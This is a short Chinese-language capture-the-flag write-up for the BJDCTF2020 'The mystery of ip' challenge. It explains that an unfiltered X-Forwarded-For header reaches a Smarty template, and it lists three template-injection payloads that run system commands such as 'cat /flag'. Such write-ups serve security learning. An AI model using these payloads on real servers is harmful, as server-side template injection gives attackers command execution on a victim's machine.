BJDCTF2020-The-mystery-of-ip

[BJDCTF2020]The mystery of ip

1.题目：模板注入

2.过程：

打开是一个页面，有flag和hint页面：

flag页面：显示了我的ip

hint：

大概率是XFF头吧……

确实IP更改了…查找资料：

使用smarty模板，且有用户可控的不加过滤的值，此时根据smarty的规则注入实现代码的执行：

{exec(“cat /flag”)}

{system(“cat /flag”)}

{if system(“cat /flag”)}{if}

都可以

PHP的模板注入（Smarty模板CSDN）

Smarty SSTI

有人提交的一个smarty漏洞

这个题是我走私者没思路的是写的，万万没想到接触了新的东西……还有很多人喷smarty